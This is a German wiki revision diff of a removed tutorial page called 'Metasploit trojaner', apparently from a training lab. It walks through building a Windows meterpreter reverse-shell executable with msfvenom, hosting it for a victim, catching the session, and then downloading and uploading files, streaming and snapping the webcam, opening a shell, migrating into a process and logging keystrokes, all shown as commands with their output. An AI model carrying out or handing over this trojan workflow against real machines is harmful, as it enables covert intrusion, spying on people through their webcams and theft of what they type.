Metasploit trojaner: Unterschied zwischen den Versionen

@@ Zeile 1: / Zeile 1: @@
-=Payload erstellen=
-*msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.81.1.91 LPORT=4444 -f exe > shell.exe
-*cp shell.exe /var/www/html/
-=Payload auf den Opfer Rechner bringen und ausführen=
-[[Datei:metasploit-101.png]]
-=Konsole starten=
-*msfconsole
-<pre>
-Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
-Aiee, Killing Interrupt handler
-Kernel panic: Attempted to kill the idle task!
-In swapper task - not syncing
-       =[ metasploit v4.16.6-dev                          ]
-+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
-+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
-+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
-</pre>
-*msf > use exploit/multi/handler
-*msf exploit(handler) > set PAYLOAD windows/meterpreter/rev
-*msf exploit(handler) > set LHOST 10.81.1.91
- LHOST => 10.81.1.91
-*msf exploit(handler) > set LPORT 4444
- LPORT => 4444
-=Starten des exploits=
-*msf exploit(handler) > exploit
- [*] Exploit running as background job 0.
- [*] Started reverse TCP handler on 10.81.1.91:4444
-=Anzeigen der Sessions=
-*msf exploit(handler) > sessions
-<pre>
-Active sessions
-===============
-  Id  Type                     Information              Connection
-  --  ----                     -----------              ----------
-   meterpreter x86/windows  shuttle\xinux @ SHUTTLE  10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
-</pre>
-=Wechseln in session=
-*msf exploit(handler) > sessions -i 1
- [*] Starting interaction with 1...
-=Metapreter Datei Managment=
-==pwd==
-*meterpreter > pwd
-==cd==
-*meterpreter > cd ..
-*meterpreter > cd \\Windows\\System32\\drivers\\etc
-==Download==
-*meterpreter > download hosts
-==upload==
-*meterpreter > cd \\Users\\xinux
-*meterpreter > upload hosts
-=Webcam=
-==list==
-*meterpreter > webcam_list
-: Integrated Camera
-==Live stream==
-*meterpreter > webcam_stream
-==snap==
-*meterpreter > webcam_snap
- [*] Starting...
- [+] Got frame
- [*] Stopped
- Webcam shot saved to: /root/PDYSnlbK.jpeg
-=Starten einer Shell=
-*meterpreter > shell
-<pre>
-Process 6588 created.
-Channel 1 created.
-Microsoft Windows [Version 10.0.14393]
-(c) 2016 Microsoft Corporation. Alle Rechte vorbehalten.
-</pre>
-*C:\Users\xinux\Downloads>
-==Beispiele Shell==
-*ipconfig
-*route print
-*netstat -n
-==Quit==
-*STRG+c
-=Keylogging=
-*meterpreter > ps | grep notepad
-==Prozess identifizieren==
-<pre>
-Filtering on 'notepad'
-Process List
-============
- PID   PPID  Name         Arch  Session  User           Path
- ---   ----  ----         ----  -------  ----           ----
-  4100  notepad.exe  x64   1        shuttle\xinux  C:\Windows\System32\notepad.exe
-</pre>
-==In den Prozess migrieren==
-*meterpreter > migrate 7480
- [*] Migrating from 5700 to 7480...
- [*] Migration completed successfully.
-==Scan start==
-*meterpreter > keyscan_start
- Starting the keystroke sniffer ...
-==Scan dump==
-*meterpreter > keyscan_dump
- Dumping captured keystrokes...
-<UMSCHALT>Hallo <UMSCHALT>Xinux <AKUT><W>ie gehts

Metasploit trojaner: Unterschied zwischen den Versionen

Aktuelle Version vom 8. November 2017, 14:02 Uhr

Navigationsmenü

Suche